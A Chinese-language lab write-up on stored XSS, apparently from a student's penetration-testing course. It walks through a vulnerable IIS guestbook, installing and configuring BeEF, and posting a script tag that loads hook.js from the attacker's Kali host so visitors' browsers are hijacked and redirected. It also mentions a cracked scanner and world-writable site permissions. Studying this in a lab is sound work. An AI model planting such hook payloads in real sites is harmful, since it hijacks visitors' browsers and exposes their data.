XSS 和 SQL 注入
Network penetration test experiment _3: NXSS 和 SQL 注入
目錄
實驗目的
瞭解什麼是XSS;瞭解XSS攻擊實施,理解防禦XSS攻擊的方法;瞭解SQL隱碼攻擊的基本原理;掌握PHP指令碼訪問MySQL資料庫的基本方法;掌握程式設計中避免出現SQL隱碼攻擊漏洞的基本方法;掌握網站配置。
系統環境
Kali Linux 2、Windows Server
網路環境
交換網路結構
實驗工具
Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
實驗步驟
XSS部分:利用Beef劫持被攻擊者客戶端瀏覽器
實驗環境搭建。
角色:留言簿網站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻擊者:Kali(使用beEF生成惡意程式碼,並通過留言方式提交到留言簿網站);
被攻擊者:訪問留言簿網站,瀏覽器被劫持。
0. 搭建GustBook網站
在管理工具裡開啟Internet資訊服務(IIS)管理器,在網站資料夾上新建網站,網站描述隨意,ip地址為Windows Server的ip,埠80即可。↓
選擇路徑的時候除了選取到資料夾還要注意要允許訪問匿名網站,否則檢查不到漏洞。↓
許可權給滿滿的。↓
搭建完網站後更改網站目錄許可權,新增Everyone使用者組並設定為完全控制。↓
然後還要改幾個小選項。↓
1. 利用AWVS掃描留言簿網站
破解進入軟體後,點選"File"–“New”–"Web Site Scan"來啟動Scan Wizard介面
在Scan single website中輸入網址:****,點選Next…………直到出表。↓
最後結果如下,於error.asp和add.asp中分別有一個XSS漏洞。↓
2. Kali使用beef生成惡意程式碼
Kali-2020中現在不自帶Beef,需要我們們自己安裝,命令↓
sudo apt-get install beef-xss
然後進入資料夾↓
cd /usr/share/beef-xss
最後輸入./beef
就ok了。
第一次會提示不要用預設的賬號密碼的提示,我當時做完忘截圖了……,不過報錯提示是↓
按照提示中的檔案進行修改 sudo vim /etc/beef-xss/config.yaml
(vim用法自行搜尋)
在這裡我把賬號密碼逆向設定,儲存退出後再./beef
。↑
注
這個如果是預設使用者可能會導致開啟失敗,所以我們可以切換為root許可權,再./beef
。(如果本身就是以root開局,那就當我沒說)
提示已經啟動了,然後我就可以用kali的火狐瀏覽器開啟連結http://127.0.0.1:3000/ui/authentication
。↓
輸入之前設定的賬號密碼,進入這個頁面。↓
檢視XSS指令碼。↓
對方如果訪問這個網站,對方的瀏覽器就會被劫持。
3. 訪問http://留言簿網站/message.asp;將惡意程式碼寫入網站留言板
惡意程式碼:
<script src="http://Kali的IP地址:3000/hook.js"></script>
一開始使用10.34.80.233的那個ip是寫死的,我在kali上訪問不了,一開始我以為是埠的原因,我就換了個8888埠的,後來掃描發現kali和windows server不在一個網段裡,查兩者的閘道器發現兩者閘道器都不一樣。所以我就把windows server設為自動獲取ip。再次nmap -sP
,兩者在同一網段內,kali也可以訪問留言簿了。
看到這個頁面發現我們可以說是成功了,看不見我們的html程式碼表示程式碼已被成功載入。
重新整理頁面或者點選首頁會出彈框。↓
然後我們回到kali這邊發現資訊已經瘋狂載入,紅色部分的一直在重複,我就不截圖了。↓
可以看到很多資訊,我們還可以幹一些“活兒”。↓
“活兒”↓
我們按照箭頭指示更改連結為:青檸起始頁,並Execute.↑
然後我們瀏覽留言簿頁面就會載入為青檸起始頁。↓
相關文章
- CSRF, XSS, Sql注入原理和處理方案SQL
- Lumen XSS 防禦 和 SQL 注入怎樣實現SQL
- XSS注入
- Web安全攻防(一)XSS注入和CSRFWeb
- SQL 注入SQL
- sql注入SQL
- SQL 注入:聯合注入SQL
- sql注入之union注入SQL
- 防止sql注入SQL
- sql注入修改SQL
- sql注入1SQL
- sql注入2SQL
- PHP 安全輸入輸出方式 「防止 XSS 注入」PHP
- XSS與SQL隱碼攻擊SQL
- NSSCTF———Web(sql注入)WebSQL
- sql注入——盲注SQL
- sql注入之型別及提交注入SQL型別
- sql注入之堆疊注入及waf繞過注入SQL
- XSS和CSRF
- 讓你徹底瞭解SQL隱碼攻擊、XSS和CSRFSQL
- 二次注入(SQL)SQL
- sql聯合注入原理SQL
- pick靶場-sql注入SQL
- 如何有效防止sql注入SQL
- SQL MAP 注入測試SQL
- SQL隱碼攻擊之字元型和數字型注入SQL字元
- Python 防止sql注入的方法PythonSQL
- Sql注入之WAF繞過SQL
- JDBC 如何有效防止 SQL 注入JDBCSQL
- sql注入簡單總結SQL
- 網路滲透測試實驗三——XSS和SQL隱碼攻擊SQL
- 網路滲透測試實驗三-XSS和SQL隱碼攻擊SQL
- Web 安全漏洞之 SQL 注入WebSQL
- php操作mysql防止sql注入(合集)PHPMySql
- JNDI注入和JNDI注入Bypass
- React 防注入攻擊 XSS攻擊 (放心大膽的用吧)React
- Spring注入:配置注入(set注入和構造器注入)與註解注入Spring
- PostMessage xss學習和挖掘